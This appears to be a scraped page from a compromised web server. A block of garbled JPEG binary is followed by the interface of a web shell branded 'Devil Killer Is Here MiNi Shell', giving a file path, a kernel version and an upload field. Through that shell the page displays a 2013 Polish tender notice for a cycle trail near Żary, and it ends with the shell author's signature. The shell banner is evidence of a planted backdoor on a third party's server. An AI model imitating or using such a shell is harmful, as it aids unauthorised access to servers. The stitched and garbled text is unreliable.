JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130722/287688-N-2013.html

<p class="kh_header"><b>Żary: Zaprojektowanie i wykonanie przebudowy drogi w zakresie utwardzenia nawierzchni traktu pieszo-rowerowego na działkach zlokalizowanych na terenie Gminy Tuplice, Gminy Trzebiel i Miasta Łęknica z wymianą uszkodzonych elementów mostu na ternie Gminy Tuplice i Gminy Trzebiel oraz z towarzyszącą infrastrukturą w ramach projektu pn.  Przygoda z Nysą-  zagospodarowanie turystyczne pogranicza polsko-niemieckiego - etap III współfinansowanego przez Unię Europejską ze środków  Programu Operacyjnego Współpracy Transgranicznej Polska -  Saksonia 2007- 2013.</b><br>
<b>Numer ogłoszenia: 287688 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Żarski , Al. Jana Pawła II 5, 68-200 Żary, woj. lubuskie, tel. 068 4790600, faks 068 4790601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatzaty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie przebudowy drogi w zakresie utwardzenia nawierzchni traktu pieszo-rowerowego na działkach zlokalizowanych na terenie Gminy Tuplice, Gminy Trzebiel i Miasta Łęknica z wymianą uszkodzonych elementów mostu na ternie Gminy Tuplice i Gminy Trzebiel oraz z towarzyszącą infrastrukturą w ramach projektu pn.  Przygoda z Nysą-  zagospodarowanie turystyczne pogranicza polsko-niemieckiego - etap III współfinansowanego przez Unię Europejską ze środków  Programu Operacyjnego Współpracy Transgranicznej Polska -  Saksonia 2007- 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zaprojektowanie i wykonanie przebudowy drogi w zakresie utwardzenia nawierzchni traktu pieszo- rowerowego na działkach zlokalizowanych na terenie Gminy Tuplice, Gminy Trzebiel i Miasta Łęknica z wymianą uszkodzonych elementów mostu na ternie Gminy Tuplice i Gminy Trzebiel oraz z towarzyszącą infrastrukturą w ramach projektu pn.  Przygoda z Nysą-  zagospodarowanie turystyczne pogranicza polsko-niemieckiego - etap III współfinansowanego przez Unię Europejską ze środków  Programu Operacyjnego Współpracy Transgranicznej Polska -  Saksonia 2007- 2013.

Trakt piesz-rowerowy ma stanowić oś łączącą turystycznie Bad Muskau oraz gminy Łęknica, Trzebiel, Tuplice z Gminą Brody, stanowiącą bazę do transgranicznego  ruchu turystycznego, promującego walory Łuku Mużakowa.
Zamówienie dotyczy części A i części B
 Przedmiot zamówienia obejmuje:
 1.1. Wykonanie dokumentacji projektowej  do zgłoszenia robót budowlanych wraz z  pozyskaniem map do celów projektowych dla ww. zadania.
     
Dokumentacje projektową należy opracować w wersji drukowanej i elektronicznej.
      Wymagana ilość egzemplarzy:
       a/  projekt budowlany - 5 egz.
       b/ projekt wykonawczy - 3 egz.
       c/ projekt obsługi komunikacyjnej - 5 egz.
       d/ Specyfikacje Techniczne Odbioru i Wykonania Robót - 4 egz.
1.2.  Prowadzenie nadzoru autorskiego.
1.3.  Wykonanie robót budowlanych w zakresie:
	a/ wykonanie traktu pieszo-rowerowego na pow. 47.500 m2 ,   
                 dł.ok. 25 km
	b/odnowienie  3 mostów z dostosowaniem do ruchu pieszo-
                 rowerowego
1.4 Wykonanie i montaż infrastruktury turystycznej:
     a/ zadaszone miejsca do odpoczynku, ze stołem, parkingiem na 6 rowerów z koszem na śmieci - 10 szt.
     b/ miejsca odpoczynku z ławostołem, koszem i parkingiem na 4 rowery - 3 szt.
     c/ ławki z koszem - 14 szt.
        d/ tablice turystyczne duże - 2 szt.
         e/ tablice turystyczne małe - 9 szt.
         f/ tablice turystyczne obiektowe - 22 szt.
         g/ znakowanie szlaku pieszo-rowerowego -  ok.40 km zgodnie z instrukcją PTTK.

W przypadku tablic należy opracować koncepcję wizualną rozmieszczenia tekstu, obrazów logotypów. Propozycje koncepcji wizualnej  należy zamieścić w ofercie ponieważ będzie ona podlegała ocenie.
Uwaga:
Wszystkie informacje umieszczone na tablicach maja być w wersji polsko-niemieckiej.

Umieszczanie napisów stałych ( nr, grawer, wypalanie).
Stałe napisy należy  umieścić w ilości do 3 szt. na każdym z elementów wchodzących w skład infrastruktury (tablice, wiata stół, ławostół, ławki, kosze).
Treść napisu poda zamawiający.

  1.5 Przygotowanie i zmiana organizacji ruchu ( dokumentacja, ustawienie znaków na ulicach  
        i drogach, ostrzeżenia na trakcie.
 2. Szczegółowy zakres prac zawiera Program Funkcjonalno-Użytkowy wraz z załącznikami   
     zawarty w Rozdziale IV SIWZ.
 3. Na przedmiot zamówienia obowiązuje gwarancja  na okres 60 m-cy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-5, 45.22.21.00-3, 45.42.00.00-1, 34.92.97.72-7, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Każda złożona oferta  musi być zabezpieczona wadium  w wysokości: 16.000,00 zł ( słownie: szesnaście tysięcy złotych)
2)	Wadium może być  wnoszone w :
        - pieniądzu
        - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,   
          z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        - gwarancjach bankowych, gwarancjach ubezpieczeniowych,
        - poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b ust. 5 pkt 2 ustawy z   
          dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
          ( Dz. U.  Nr 109, poz. 1158 z późn. zm.)
3)    Wadium wnoszone w pieniądzu wpłaca się przelewem  na konto Zamawiającego  
        nr. 21 1020 5460 0000 5102 0006 0517
4)    Zamawiający zwróci wadium zgodnie z przepisami art. 46 ust. 1, 1a  i 2 ustawy.
5)    Wykonawca traci wadium na rzecz zamawiającego  w przypadkach określonych w art. 46 ust.  
        4a i ust 5  ustawy.
6)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust.1, jeżeli w wyniku rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza.
7)   Oferta nie zabezpieczona  wadium stanowić będzie podstawę od wykluczenia wykonawcy z 
       postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca powinien wykazać, że  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty co najmniej jedną  inwestycję budowlaną polegającą na  budowie/przebudowie/remoncie drogi, traktu lub ścieżki rowerowej - utwardzeniu nawierzchni w technologii opisanej w załączonym do SIWZ Programie Funkcjonalno-Użytkowym  na powierzchni  nie mniejszej  25 000 m2  i o wartości nie mniejszej niż 1 000 000,00 zł

- Wykonawca powinien wykazać, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zamówienie w zakresie wykonania, dostawy i montażu drewnianej infrastruktury turystycznej ( np. tablice turystyczne, wiaty, miejsca odpoczynku turystów) wraz ze znakowaniem szlaków turystycznych (np. pieszych, rowerowych, pieszo-rowerowych, ) zgodnie z Instrukcją PTTK o długości nie mniejszej niż  20 km, o łącznej 
                wartości  nie mniejszej niż kwota  100 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że dysponuje:
      -  w zakresie zespołu projektowego, jedną osobą z uprawnieniami do projektowania       
         w specjalności konstrukcyjno-budowlanej oraz jedną osobą z uprawnieniami do 
         projektowania w specjalności drogowej.
      - w zakresie zespołu realizującego zamówienie, jedną osobą do pełnienia funkcji 
        kierownika budowy  w branży drogowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. wypełniony formularz ofertowy  wg załącznika nr 1 
b. w przypadku Wykonawców występujących wspólnie - pełnomocnictwo 
c. parafowany wzór umowy.
    d. wypełniona i podpisana lista podmiotów należących do tej samej grupy kapitałowej, w 
         rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów 
        (  Dz. U. Nr 50 poz. 331 z póź. zm.), albo informacja o tym, że Wykonawca nie należy  
        do grupy kapitałowej  wg załącznika nr 4 do SIWZ.
     e. dowód wniesienia wadium przetargowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Funkcjonalność rozwiazań technicznych(wizualizacja infrastruktury turystycznej) - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1. Zmiany adresu/siedziby Zamawiającego/Wykonawcy.
2.  Zmiana osób występujących po stronie Zamawiającego/Wykonawcy.
3.Zmiany wynagrodzenia związku ze zmianą stawki podatku od towarów i usług (VAT).
4. Zmiany terminu wykonania z uwagi na niesprzyjające warunki pogodowe.

Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności, itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatzary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żarach, al. Jana Pawła II 5, pok. nr 210..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Żarach, al. Jana Pawła II 5, pok. nr 210 lub biuro podawcze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane przez Unię Europejską ze środków Programu Operacyjnego Współpracy Zagranicznej Polska -Saksonia 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com